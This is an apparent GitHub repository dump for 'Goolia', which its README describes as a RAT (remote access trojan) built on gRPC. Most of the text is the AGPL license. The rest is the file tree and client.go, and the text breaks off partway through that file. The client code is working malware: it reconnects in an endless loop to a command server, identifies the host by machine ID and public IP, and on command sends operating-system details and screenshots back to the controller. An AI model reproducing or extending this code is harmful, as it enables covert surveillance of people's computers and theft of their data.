├── .gitignore ├── LICENSE ├── README.md ├── client ├── client.go ├── go.mod ├── go.sum └── utils │ ├── osinfo.go │ └── screenshot.go ├── com.proto ├── go-build.bash ├── proto ├── com.pb.go └── go.mod ├── protobuf.bash └── server ├── go.mod ├── go.sum └── server.go /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | 17 | build 18 | client/vendor/* 19 | server/vendor/* -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU AFFERO GENERAL PUBLIC LICENSE 2 | Version 3, 19 November 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU Affero General Public License is a free, copyleft license for 11 | software and other kinds of works, specifically designed to ensure 12 | cooperation with the community in the case of network server software. 13 | 14 | The licenses for most software and other practical works are designed 15 | to take away your freedom to share and change the works. By contrast, 16 | our General Public Licenses are intended to guarantee your freedom to 17 | share and change all versions of a program--to make sure it remains free 18 | software for all its users. 19 | 20 | When we speak of free software, we are referring to freedom, not 21 | price. Our General Public Licenses are designed to make sure that you 22 | have the freedom to distribute copies of free software (and charge for 23 | them if you wish), that you receive source code or can get it if you 24 | want it, that you can change the software or use pieces of it in new 25 | free programs, and that you know you can do these things. 26 | 27 | Developers that use our General Public Licenses protect your rights 28 | with two steps: (1) assert copyright on the software, and (2) offer 29 | you this License which gives you legal permission to copy, distribute 30 | and/or modify the software. 31 | 32 | A secondary benefit of defending all users' freedom is that 33 | improvements made in alternate versions of the program, if they 34 | receive widespread use, become available for other developers to 35 | incorporate. Many developers of free software are heartened and 36 | encouraged by the resulting cooperation. However, in the case of 37 | software used on network servers, this result may fail to come about. 38 | The GNU General Public License permits making a modified version and 39 | letting the public access it on a server without ever releasing its 40 | source code to the public. 41 | 42 | The GNU Affero General Public License is designed specifically to 43 | ensure that, in such cases, the modified source code becomes available 44 | to the community. It requires the operator of a network server to 45 | provide the source code of the modified version running there to the 46 | users of that server. Therefore, public use of a modified version, on 47 | a publicly accessible server, gives the public access to the source 48 | code of the modified version. 49 | 50 | An older license, called the Affero General Public License and 51 | published by Affero, was designed to accomplish similar goals. This is 52 | a different license, not a version of the Affero GPL, but Affero has 53 | released a new version of the Affero GPL which permits relicensing under 54 | this license. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | TERMS AND CONDITIONS 60 | 61 | 0. Definitions. 62 | 63 | "This License" refers to version 3 of the GNU Affero General Public License. 64 | 65 | "Copyright" also means copyright-like laws that apply to other kinds of 66 | works, such as semiconductor masks. 67 | 68 | "The Program" refers to any copyrightable work licensed under this 69 | License. Each licensee is addressed as "you". "Licensees" and 70 | "recipients" may be individuals or organizations. 71 | 72 | To "modify" a work means to copy from or adapt all or part of the work 73 | in a fashion requiring copyright permission, other than the making of an 74 | exact copy. The resulting work is called a "modified version" of the 75 | earlier work or a work "based on" the earlier work. 76 | 77 | A "covered work" means either the unmodified Program or a work based 78 | on the Program. 79 | 80 | To "propagate" a work means to do anything with it that, without 81 | permission, would make you directly or secondarily liable for 82 | infringement under applicable copyright law, except executing it on a 83 | computer or modifying a private copy. Propagation includes copying, 84 | distribution (with or without modification), making available to the 85 | public, and in some countries other activities as well. 86 | 87 | To "convey" a work means any kind of propagation that enables other 88 | parties to make or receive copies. Mere interaction with a user through 89 | a computer network, with no transfer of a copy, is not conveying. 90 | 91 | An interactive user interface displays "Appropriate Legal Notices" 92 | to the extent that it includes a convenient and prominently visible 93 | feature that (1) displays an appropriate copyright notice, and (2) 94 | tells the user that there is no warranty for the work (except to the 95 | extent that warranties are provided), that licensees may convey the 96 | work under this License, and how to view a copy of this License. If 97 | the interface presents a list of user commands or options, such as a 98 | menu, a prominent item in the list meets this criterion. 99 | 100 | 1. Source Code. 101 | 102 | The "source code" for a work means the preferred form of the work 103 | for making modifications to it. "Object code" means any non-source 104 | form of a work. 105 | 106 | A "Standard Interface" means an interface that either is an official 107 | standard defined by a recognized standards body, or, in the case of 108 | interfaces specified for a particular programming language, one that 109 | is widely used among developers working in that language. 110 | 111 | The "System Libraries" of an executable work include anything, other 112 | than the work as a whole, that (a) is included in the normal form of 113 | packaging a Major Component, but which is not part of that Major 114 | Component, and (b) serves only to enable use of the work with that 115 | Major Component, or to implement a Standard Interface for which an 116 | implementation is available to the public in source code form. A 117 | "Major Component", in this context, means a major essential component 118 | (kernel, window system, and so on) of the specific operating system 119 | (if any) on which the executable work runs, or a compiler used to 120 | produce the work, or an object code interpreter used to run it. 121 | 122 | The "Corresponding Source" for a work in object code form means all 123 | the source code needed to generate, install, and (for an executable 124 | work) run the object code and to modify the work, including scripts to 125 | control those activities. However, it does not include the work's 126 | System Libraries, or general-purpose tools or generally available free 127 | programs which are used unmodified in performing those activities but 128 | which are not part of the work. For example, Corresponding Source 129 | includes interface definition files associated with source files for 130 | the work, and the source code for shared libraries and dynamically 131 | linked subprograms that the work is specifically designed to require, 132 | such as by intimate data communication or control flow between those 133 | subprograms and other parts of the work. 134 | 135 | The Corresponding Source need not include anything that users 136 | can regenerate automatically from other parts of the Corresponding 137 | Source. 138 | 139 | The Corresponding Source for a work in source code form is that 140 | same work. 141 | 142 | 2. Basic Permissions. 143 | 144 | All rights granted under this License are granted for the term of 145 | copyright on the Program, and are irrevocable provided the stated 146 | conditions are met. This License explicitly affirms your unlimited 147 | permission to run the unmodified Program. The output from running a 148 | covered work is covered by this License only if the output, given its 149 | content, constitutes a covered work. This License acknowledges your 150 | rights of fair use or other equivalent, as provided by copyright law. 151 | 152 | You may make, run and propagate covered works that you do not 153 | convey, without conditions so long as your license otherwise remains 154 | in force. You may convey covered works to others for the sole purpose 155 | of having them make modifications exclusively for you, or provide you 156 | with facilities for running those works, provided that you comply with 157 | the terms of this License in conveying all material for which you do 158 | not control copyright. Those thus making or running the covered works 159 | for you must do so exclusively on your behalf, under your direction 160 | and control, on terms that prohibit them from making any copies of 161 | your copyrighted material outside their relationship with you. 162 | 163 | Conveying under any other circumstances is permitted solely under 164 | the conditions stated below. Sublicensing is not allowed; section 10 165 | makes it unnecessary. 166 | 167 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 168 | 169 | No covered work shall be deemed part of an effective technological 170 | measure under any applicable law fulfilling obligations under article 171 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 172 | similar laws prohibiting or restricting circumvention of such 173 | measures. 174 | 175 | When you convey a covered work, you waive any legal power to forbid 176 | circumvention of technological measures to the extent such circumvention 177 | is effected by exercising rights under this License with respect to 178 | the covered work, and you disclaim any intention to limit operation or 179 | modification of the work as a means of enforcing, against the work's 180 | users, your or third parties' legal rights to forbid circumvention of 181 | technological measures. 182 | 183 | 4. Conveying Verbatim Copies. 184 | 185 | You may convey verbatim copies of the Program's source code as you 186 | receive it, in any medium, provided that you conspicuously and 187 | appropriately publish on each copy an appropriate copyright notice; 188 | keep intact all notices stating that this License and any 189 | non-permissive terms added in accord with section 7 apply to the code; 190 | keep intact all notices of the absence of any warranty; and give all 191 | recipients a copy of this License along with the Program. 192 | 193 | You may charge any price or no price for each copy that you convey, 194 | and you may offer support or warranty protection for a fee. 195 | 196 | 5. Conveying Modified Source Versions. 197 | 198 | You may convey a work based on the Program, or the modifications to 199 | produce it from the Program, in the form of source code under the 200 | terms of section 4, provided that you also meet all of these conditions: 201 | 202 | a) The work must carry prominent notices stating that you modified 203 | it, and giving a relevant date. 204 | 205 | b) The work must carry prominent notices stating that it is 206 | released under this License and any conditions added under section 207 | 7. This requirement modifies the requirement in section 4 to 208 | "keep intact all notices". 209 | 210 | c) You must license the entire work, as a whole, under this 211 | License to anyone who comes into possession of a copy. This 212 | License will therefore apply, along with any applicable section 7 213 | additional terms, to the whole of the work, and all its parts, 214 | regardless of how they are packaged. This License gives no 215 | permission to license the work in any other way, but it does not 216 | invalidate such permission if you have separately received it. 217 | 218 | d) If the work has interactive user interfaces, each must display 219 | Appropriate Legal Notices; however, if the Program has interactive 220 | interfaces that do not display Appropriate Legal Notices, your 221 | work need not make them do so. 222 | 223 | A compilation of a covered work with other separate and independent 224 | works, which are not by their nature extensions of the covered work, 225 | and which are not combined with it such as to form a larger program, 226 | in or on a volume of a storage or distribution medium, is called an 227 | "aggregate" if the compilation and its resulting copyright are not 228 | used to limit the access or legal rights of the compilation's users 229 | beyond what the individual works permit. Inclusion of a covered work 230 | in an aggregate does not cause this License to apply to the other 231 | parts of the aggregate. 232 | 233 | 6. Conveying Non-Source Forms. 234 | 235 | You may convey a covered work in object code form under the terms 236 | of sections 4 and 5, provided that you also convey the 237 | machine-readable Corresponding Source under the terms of this License, 238 | in one of these ways: 239 | 240 | a) Convey the object code in, or embodied in, a physical product 241 | (including a physical distribution medium), accompanied by the 242 | Corresponding Source fixed on a durable physical medium 243 | customarily used for software interchange. 244 | 245 | b) Convey the object code in, or embodied in, a physical product 246 | (including a physical distribution medium), accompanied by a 247 | written offer, valid for at least three years and valid for as 248 | long as you offer spare parts or customer support for that product 249 | model, to give anyone who possesses the object code either (1) a 250 | copy of the Corresponding Source for all the software in the 251 | product that is covered by this License, on a durable physical 252 | medium customarily used for software interchange, for a price no 253 | more than your reasonable cost of physically performing this 254 | conveying of source, or (2) access to copy the 255 | Corresponding Source from a network server at no charge. 256 | 257 | c) Convey individual copies of the object code with a copy of the 258 | written offer to provide the Corresponding Source. This 259 | alternative is allowed only occasionally and noncommercially, and 260 | only if you received the object code with such an offer, in accord 261 | with subsection 6b. 262 | 263 | d) Convey the object code by offering access from a designated 264 | place (gratis or for a charge), and offer equivalent access to the 265 | Corresponding Source in the same way through the same place at no 266 | further charge. You need not require recipients to copy the 267 | Corresponding Source along with the object code. If the place to 268 | copy the object code is a network server, the Corresponding Source 269 | may be on a different server (operated by you or a third party) 270 | that supports equivalent copying facilities, provided you maintain 271 | clear directions next to the object code saying where to find the 272 | Corresponding Source. Regardless of what server hosts the 273 | Corresponding Source, you remain obligated to ensure that it is 274 | available for as long as needed to satisfy these requirements. 275 | 276 | e) Convey the object code using peer-to-peer transmission, provided 277 | you inform other peers where the object code and Corresponding 278 | Source of the work are being offered to the general public at no 279 | charge under subsection 6d. 280 | 281 | A separable portion of the object code, whose source code is excluded 282 | from the Corresponding Source as a System Library, need not be 283 | included in conveying the object code work. 284 | 285 | A "User Product" is either (1) a "consumer product", which means any 286 | tangible personal property which is normally used for personal, family, 287 | or household purposes, or (2) anything designed or sold for incorporation 288 | into a dwelling. In determining whether a product is a consumer product, 289 | doubtful cases shall be resolved in favor of coverage. For a particular 290 | product received by a particular user, "normally used" refers to a 291 | typical or common use of that class of product, regardless of the status 292 | of the particular user or of the way in which the particular user 293 | actually uses, or expects or is expected to use, the product. A product 294 | is a consumer product regardless of whether the product has substantial 295 | commercial, industrial or non-consumer uses, unless such uses represent 296 | the only significant mode of use of the product. 297 | 298 | "Installation Information" for a User Product means any methods, 299 | procedures, authorization keys, or other information required to install 300 | and execute modified versions of a covered work in that User Product from 301 | a modified version of its Corresponding Source. The information must 302 | suffice to ensure that the continued functioning of the modified object 303 | code is in no case prevented or interfered with solely because 304 | modification has been made. 305 | 306 | If you convey an object code work under this section in, or with, or 307 | specifically for use in, a User Product, and the conveying occurs as 308 | part of a transaction in which the right of possession and use of the 309 | User Product is transferred to the recipient in perpetuity or for a 310 | fixed term (regardless of how the transaction is characterized), the 311 | Corresponding Source conveyed under this section must be accompanied 312 | by the Installation Information. But this requirement does not apply 313 | if neither you nor any third party retains the ability to install 314 | modified object code on the User Product (for example, the work has 315 | been installed in ROM). 316 | 317 | The requirement to provide Installation Information does not include a 318 | requirement to continue to provide support service, warranty, or updates 319 | for a work that has been modified or installed by the recipient, or for 320 | the User Product in which it has been modified or installed. Access to a 321 | network may be denied when the modification itself materially and 322 | adversely affects the operation of the network or violates the rules and 323 | protocols for communication across the network. 324 | 325 | Corresponding Source conveyed, and Installation Information provided, 326 | in accord with this section must be in a format that is publicly 327 | documented (and with an implementation available to the public in 328 | source code form), and must require no special password or key for 329 | unpacking, reading or copying. 330 | 331 | 7. Additional Terms. 332 | 333 | "Additional permissions" are terms that supplement the terms of this 334 | License by making exceptions from one or more of its conditions. 335 | Additional permissions that are applicable to the entire Program shall 336 | be treated as though they were included in this License, to the extent 337 | that they are valid under applicable law. If additional permissions 338 | apply only to part of the Program, that part may be used separately 339 | under those permissions, but the entire Program remains governed by 340 | this License without regard to the additional permissions. 341 | 342 | When you convey a copy of a covered work, you may at your option 343 | remove any additional permissions from that copy, or from any part of 344 | it. (Additional permissions may be written to require their own 345 | removal in certain cases when you modify the work.) You may place 346 | additional permissions on material, added by you to a covered work, 347 | for which you have or can give appropriate copyright permission. 348 | 349 | Notwithstanding any other provision of this License, for material you 350 | add to a covered work, you may (if authorized by the copyright holders of 351 | that material) supplement the terms of this License with terms: 352 | 353 | a) Disclaiming warranty or limiting liability differently from the 354 | terms of sections 15 and 16 of this License; or 355 | 356 | b) Requiring preservation of specified reasonable legal notices or 357 | author attributions in that material or in the Appropriate Legal 358 | Notices displayed by works containing it; or 359 | 360 | c) Prohibiting misrepresentation of the origin of that material, or 361 | requiring that modified versions of such material be marked in 362 | reasonable ways as different from the original version; or 363 | 364 | d) Limiting the use for publicity purposes of names of licensors or 365 | authors of the material; or 366 | 367 | e) Declining to grant rights under trademark law for use of some 368 | trade names, trademarks, or service marks; or 369 | 370 | f) Requiring indemnification of licensors and authors of that 371 | material by anyone who conveys the material (or modified versions of 372 | it) with contractual assumptions of liability to the recipient, for 373 | any liability that these contractual assumptions directly impose on 374 | those licensors and authors. 375 | 376 | All other non-permissive additional terms are considered "further 377 | restrictions" within the meaning of section 10. If the Program as you 378 | received it, or any part of it, contains a notice stating that it is 379 | governed by this License along with a term that is a further 380 | restriction, you may remove that term. If a license document contains 381 | a further restriction but permits relicensing or conveying under this 382 | License, you may add to a covered work material governed by the terms 383 | of that license document, provided that the further restriction does 384 | not survive such relicensing or conveying. 385 | 386 | If you add terms to a covered work in accord with this section, you 387 | must place, in the relevant source files, a statement of the 388 | additional terms that apply to those files, or a notice indicating 389 | where to find the applicable terms. 390 | 391 | Additional terms, permissive or non-permissive, may be stated in the 392 | form of a separately written license, or stated as exceptions; 393 | the above requirements apply either way. 394 | 395 | 8. Termination. 396 | 397 | You may not propagate or modify a covered work except as expressly 398 | provided under this License. Any attempt otherwise to propagate or 399 | modify it is void, and will automatically terminate your rights under 400 | this License (including any patent licenses granted under the third 401 | paragraph of section 11). 402 | 403 | However, if you cease all violation of this License, then your 404 | license from a particular copyright holder is reinstated (a) 405 | provisionally, unless and until the copyright holder explicitly and 406 | finally terminates your license, and (b) permanently, if the copyright 407 | holder fails to notify you of the violation by some reasonable means 408 | prior to 60 days after the cessation. 409 | 410 | Moreover, your license from a particular copyright holder is 411 | reinstated permanently if the copyright holder notifies you of the 412 | violation by some reasonable means, this is the first time you have 413 | received notice of violation of this License (for any work) from that 414 | copyright holder, and you cure the violation prior to 30 days after 415 | your receipt of the notice. 416 | 417 | Termination of your rights under this section does not terminate the 418 | licenses of parties who have received copies or rights from you under 419 | this License. If your rights have been terminated and not permanently 420 | reinstated, you do not qualify to receive new licenses for the same 421 | material under section 10. 422 | 423 | 9. Acceptance Not Required for Having Copies. 424 | 425 | You are not required to accept this License in order to receive or 426 | run a copy of the Program. Ancillary propagation of a covered work 427 | occurring solely as a consequence of using peer-to-peer transmission 428 | to receive a copy likewise does not require acceptance. However, 429 | nothing other than this License grants you permission to propagate or 430 | modify any covered work. These actions infringe copyright if you do 431 | not accept this License. Therefore, by modifying or propagating a 432 | covered work, you indicate your acceptance of this License to do so. 433 | 434 | 10. Automatic Licensing of Downstream Recipients. 435 | 436 | Each time you convey a covered work, the recipient automatically 437 | receives a license from the original licensors, to run, modify and 438 | propagate that work, subject to this License. You are not responsible 439 | for enforcing compliance by third parties with this License. 440 | 441 | An "entity transaction" is a transaction transferring control of an 442 | organization, or substantially all assets of one, or subdividing an 443 | organization, or merging organizations. If propagation of a covered 444 | work results from an entity transaction, each party to that 445 | transaction who receives a copy of the work also receives whatever 446 | licenses to the work the party's predecessor in interest had or could 447 | give under the previous paragraph, plus a right to possession of the 448 | Corresponding Source of the work from the predecessor in interest, if 449 | the predecessor has it or can get it with reasonable efforts. 450 | 451 | You may not impose any further restrictions on the exercise of the 452 | rights granted or affirmed under this License. For example, you may 453 | not impose a license fee, royalty, or other charge for exercise of 454 | rights granted under this License, and you may not initiate litigation 455 | (including a cross-claim or counterclaim in a lawsuit) alleging that 456 | any patent claim is infringed by making, using, selling, offering for 457 | sale, or importing the Program or any portion of it. 458 | 459 | 11. Patents. 460 | 461 | A "contributor" is a copyright holder who authorizes use under this 462 | License of the Program or a work on which the Program is based. The 463 | work thus licensed is called the contributor's "contributor version". 464 | 465 | A contributor's "essential patent claims" are all patent claims 466 | owned or controlled by the contributor, whether already acquired or 467 | hereafter acquired, that would be infringed by some manner, permitted 468 | by this License, of making, using, or selling its contributor version, 469 | but do not include claims that would be infringed only as a 470 | consequence of further modification of the contributor version. For 471 | purposes of this definition, "control" includes the right to grant 472 | patent sublicenses in a manner consistent with the requirements of 473 | this License. 474 | 475 | Each contributor grants you a non-exclusive, worldwide, royalty-free 476 | patent license under the contributor's essential patent claims, to 477 | make, use, sell, offer for sale, import and otherwise run, modify and 478 | propagate the contents of its contributor version. 479 | 480 | In the following three paragraphs, a "patent license" is any express 481 | agreement or commitment, however denominated, not to enforce a patent 482 | (such as an express permission to practice a patent or covenant not to 483 | sue for patent infringement). To "grant" such a patent license to a 484 | party means to make such an agreement or commitment not to enforce a 485 | patent against the party. 486 | 487 | If you convey a covered work, knowingly relying on a patent license, 488 | and the Corresponding Source of the work is not available for anyone 489 | to copy, free of charge and under the terms of this License, through a 490 | publicly available network server or other readily accessible means, 491 | then you must either (1) cause the Corresponding Source to be so 492 | available, or (2) arrange to deprive yourself of the benefit of the 493 | patent license for this particular work, or (3) arrange, in a manner 494 | consistent with the requirements of this License, to extend the patent 495 | license to downstream recipients. "Knowingly relying" means you have 496 | actual knowledge that, but for the patent license, your conveying the 497 | covered work in a country, or your recipient's use of the covered work 498 | in a country, would infringe one or more identifiable patents in that 499 | country that you have reason to believe are valid. 500 | 501 | If, pursuant to or in connection with a single transaction or 502 | arrangement, you convey, or propagate by procuring conveyance of, a 503 | covered work, and grant a patent license to some of the parties 504 | receiving the covered work authorizing them to use, propagate, modify 505 | or convey a specific copy of the covered work, then the patent license 506 | you grant is automatically extended to all recipients of the covered 507 | work and works based on it. 508 | 509 | A patent license is "discriminatory" if it does not include within 510 | the scope of its coverage, prohibits the exercise of, or is 511 | conditioned on the non-exercise of one or more of the rights that are 512 | specifically granted under this License. You may not convey a covered 513 | work if you are a party to an arrangement with a third party that is 514 | in the business of distributing software, under which you make payment 515 | to the third party based on the extent of your activity of conveying 516 | the work, and under which the third party grants, to any of the 517 | parties who would receive the covered work from you, a discriminatory 518 | patent license (a) in connection with copies of the covered work 519 | conveyed by you (or copies made from those copies), or (b) primarily 520 | for and in connection with specific products or compilations that 521 | contain the covered work, unless you entered into that arrangement, 522 | or that patent license was granted, prior to 28 March 2007. 523 | 524 | Nothing in this License shall be construed as excluding or limiting 525 | any implied license or other defenses to infringement that may 526 | otherwise be available to you under applicable patent law. 527 | 528 | 12. No Surrender of Others' Freedom. 529 | 530 | If conditions are imposed on you (whether by court order, agreement or 531 | otherwise) that contradict the conditions of this License, they do not 532 | excuse you from the conditions of this License. If you cannot convey a 533 | covered work so as to satisfy simultaneously your obligations under this 534 | License and any other pertinent obligations, then as a consequence you may 535 | not convey it at all. For example, if you agree to terms that obligate you 536 | to collect a royalty for further conveying from those to whom you convey 537 | the Program, the only way you could satisfy both those terms and this 538 | License would be to refrain entirely from conveying the Program. 539 | 540 | 13. Remote Network Interaction; Use with the GNU General Public License. 541 | 542 | Notwithstanding any other provision of this License, if you modify the 543 | Program, your modified version must prominently offer all users 544 | interacting with it remotely through a computer network (if your version 545 | supports such interaction) an opportunity to receive the Corresponding 546 | Source of your version by providing access to the Corresponding Source 547 | from a network server at no charge, through some standard or customary 548 | means of facilitating copying of software. This Corresponding Source 549 | shall include the Corresponding Source for any work covered by version 3 550 | of the GNU General Public License that is incorporated pursuant to the 551 | following paragraph. 552 | 553 | Notwithstanding any other provision of this License, you have 554 | permission to link or combine any covered work with a work licensed 555 | under version 3 of the GNU General Public License into a single 556 | combined work, and to convey the resulting work. The terms of this 557 | License will continue to apply to the part which is the covered work, 558 | but the work with which it is combined will remain governed by version 559 | 3 of the GNU General Public License. 560 | 561 | 14. Revised Versions of this License. 562 | 563 | The Free Software Foundation may publish revised and/or new versions of 564 | the GNU Affero General Public License from time to time. Such new versions 565 | will be similar in spirit to the present version, but may differ in detail to 566 | address new problems or concerns. 567 | 568 | Each version is given a distinguishing version number. If the 569 | Program specifies that a certain numbered version of the GNU Affero General 570 | Public License "or any later version" applies to it, you have the 571 | option of following the terms and conditions either of that numbered 572 | version or of any later version published by the Free Software 573 | Foundation. If the Program does not specify a version number of the 574 | GNU Affero General Public License, you may choose any version ever published 575 | by the Free Software Foundation. 576 | 577 | If the Program specifies that a proxy can decide which future 578 | versions of the GNU Affero General Public License can be used, that proxy's 579 | public statement of acceptance of a version permanently authorizes you 580 | to choose that version for the Program. 581 | 582 | Later license versions may give you additional or different 583 | permissions. However, no additional obligations are imposed on any 584 | author or copyright holder as a result of your choosing to follow a 585 | later version. 586 | 587 | 15. Disclaimer of Warranty. 588 | 589 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 590 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 591 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 592 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 593 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 594 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 595 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 596 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 597 | 598 | 16. Limitation of Liability. 599 | 600 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 601 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 602 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 603 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 604 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 605 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 606 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 607 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 608 | SUCH DAMAGES. 609 | 610 | 17. Interpretation of Sections 15 and 16. 611 | 612 | If the disclaimer of warranty and limitation of liability provided 613 | above cannot be given local legal effect according to their terms, 614 | reviewing courts shall apply local law that most closely approximates 615 | an absolute waiver of all civil liability in connection with the 616 | Program, unless a warranty or assumption of liability accompanies a 617 | copy of the Program in return for a fee. 618 | 619 | END OF TERMS AND CONDITIONS 620 | 621 | How to Apply These Terms to Your New Programs 622 | 623 | If you develop a new program, and you want it to be of the greatest 624 | possible use to the public, the best way to achieve this is to make it 625 | free software which everyone can redistribute and change under these terms. 626 | 627 | To do so, attach the following notices to the program. It is safest 628 | to attach them to the start of each source file to most effectively 629 | state the exclusion of warranty; and each file should have at least 630 | the "copyright" line and a pointer to where the full notice is found. 631 | 632 | 633 | Copyright (C) 634 | 635 | This program is free software: you can redistribute it and/or modify 636 | it under the terms of the GNU Affero General Public License as published 637 | by the Free Software Foundation, either version 3 of the License, or 638 | (at your option) any later version. 639 | 640 | This program is distributed in the hope that it will be useful, 641 | but WITHOUT ANY WARRANTY; without even the implied warranty of 642 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 643 | GNU Affero General Public License for more details. 644 | 645 | You should have received a copy of the GNU Affero General Public License 646 | along with this program. If not, see . 647 | 648 | Also add information on how to contact you by electronic and paper mail. 649 | 650 | If your software can interact with users remotely through a computer 651 | network, you should also make sure that it provides a way for users to 652 | get its source. For example, if your program is a web application, its 653 | interface could display a "Source" link that leads users to an archive 654 | of the code. There are many ways you could offer source, and different 655 | solutions will be better for different programs; see section 13 for the 656 | specific requirements. 657 | 658 | You should also get your employer (if you work as a programmer) or school, 659 | if any, to sign a "copyright disclaimer" for the program, if necessary. 660 | For more information on this, and how to apply and follow the GNU AGPL, see 661 | . 662 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Goolia 2 | I'm trying to innovate the idea of RAT. This is an example of how gRPC can be used in any way! 3 | 4 | A detailed description will be made as soon as possible. 5 | 6 | Feel free to collaborate!! 7 | -------------------------------------------------------------------------------- /client/client.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "context" 5 | "encoding/json" 6 | "io" 7 | "log" 8 | "runtime" 9 | "time" 10 | 11 | "github.com/NukeDev/Goolia-Rat/client/utils" 12 | pb "github.com/NukeDev/Goolia-Rat/proto" 13 | "github.com/denisbrodbeck/machineid" 14 | externalip "github.com/glendc/go-external-ip" 15 | "google.golang.org/grpc" 16 | ) 17 | 18 | //Client local struct 19 | type Client struct { 20 | ID string 21 | IPAddress string 22 | OS string 23 | } 24 | 25 | var localClient Client 26 | var commandWaitingList []string 27 | 28 | func main() { 29 | 30 | for { 31 | ClientProcess() 32 | } 33 | 34 | } 35 | 36 | //ClientProcess - Main instance 37 | func ClientProcess() { 38 | for { 39 | time.Sleep(time.Second * 5) 40 | // dail server 41 | conn, err := grpc.Dial(":50005", grpc.WithInsecure(), grpc.WithTimeout(time.Second*10000)) 42 | if err != nil { 43 | log.Printf("Can't connect to Master Server!! - %v", err) 44 | continue 45 | } 46 | 47 | //generate client data 48 | localClient.Generate() 49 | // create stream 50 | client := pb.NewComClient(conn) 51 | 52 | stream, err := client.HandleCommands(context.Background()) 53 | if err != nil { 54 | log.Printf("There was an error while opening the stream - %v", err) 55 | continue 56 | } 57 | ctx := stream.Context() 58 | done := make(chan bool) 59 | 60 | // first goroutine sends ping requests to master servers to wait commands 61 | go func() { 62 | for { 63 | 64 | req := pb.Request{ClientID: localClient.ID, ClientIPAddress: localClient.IPAddress, Command: "ping", Data: nil} 65 | if err := stream.Send(&req); err != nil { 66 | log.Printf("Can't send PING request to Master Server - %v", err) 67 | log.Println("Reloading connection...") 68 | break 69 | } 70 | time.Sleep(time.Second * 10) 71 | } 72 | 73 | }() 74 | 75 | // second goroutine receives data from stream 76 | // if stream is finished it closes done channel 77 | go func() { 78 | for { 79 | resp, err := stream.Recv() 80 | if err == io.EOF { 81 | log.Printf("%v", err) 82 | log.Println("Reloading connection...") 83 | break 84 | } 85 | if err != nil { 86 | log.Printf("Can't receive on opened channel %v", err) 87 | log.Println("Reloading connection...") 88 | break 89 | } 90 | 91 | switch resp.Command { 92 | case "ping": 93 | { 94 | 95 | } 96 | case "osinfo": 97 | { 98 | info, err := utils.GetOsInfo() 99 | if err != nil { 100 | log.Printf("%v", err) 101 | } 102 | 103 | b, err := json.Marshal(info) 104 | 105 | if err != nil { 106 | log.Printf("%v", err) 107 | 108 | } 109 | 110 | if err := localClient.Send(resp.Command, b, stream); err != nil { 111 | break 112 | } 113 | 114 | } 115 | case "screenshot": 116 | { 117 | myShots := utils.GetClientScreenshots() 118 | 119 | if len(myShots) > 0 { 120 | 121 | b, err := json.Marshal(myShots) 122 | 123 | if err != nil { 124 | log.Printf("%v", err) 125 | 126 | } 127 | 128 | if err := localClient.Send(resp.Command, b, stream); err != nil { 129 | break 130 | } 131 | } 132 | 133 | } 134 | case "not-found": 135 | default: 136 | { 137 | log.Printf("No command found as %s", resp.Command) 138 | } 139 | } 140 | } 141 | }() 142 | 143 | // third goroutine closes done channel 144 | // if context is done 145 | go func() { 146 | <-ctx.Done() 147 | if err := ctx.Err(); err != nil { 148 | log.Println(err) 149 | } 150 | close(done) 151 | }() 152 | 153 | <-done 154 | log.Printf("Connection finished...") 155 | log.Println("Reloading connection...") 156 | } 157 | } 158 | 159 | //Generate Client Unique ID and Gets Public IPAddress 160 | func (cl *Client) Generate() { 161 | id, err := machineid.ProtectedID("GooliaClient") 162 | if err != nil { 163 | log.Print(err) 164 | } 165 | cl.ID = id 166 | 167 | consensus := externalip.DefaultConsensus(nil, nil) 168 | 169 | ip, err := consensus.ExternalIP() 170 | if err == nil { 171 | cl.IPAddress = (ip.String()) 172 | } else { 173 | cl.IPAddress = "undefined" 174 | } 175 | 176 | cl.OS = runtime.GOOS 177 | } 178 | 179 | //Send response to server 180 | func (cl *Client) Send(command string, data []byte, stream pb.Com_HandleCommandsClient) error { 181 | req := pb.Request{ClientID: cl.ID, ClientIPAddress: cl.IPAddress, Command: command, Data: data} 182 | 183 | if err := stream.Send(&req); err != nil { 184 | 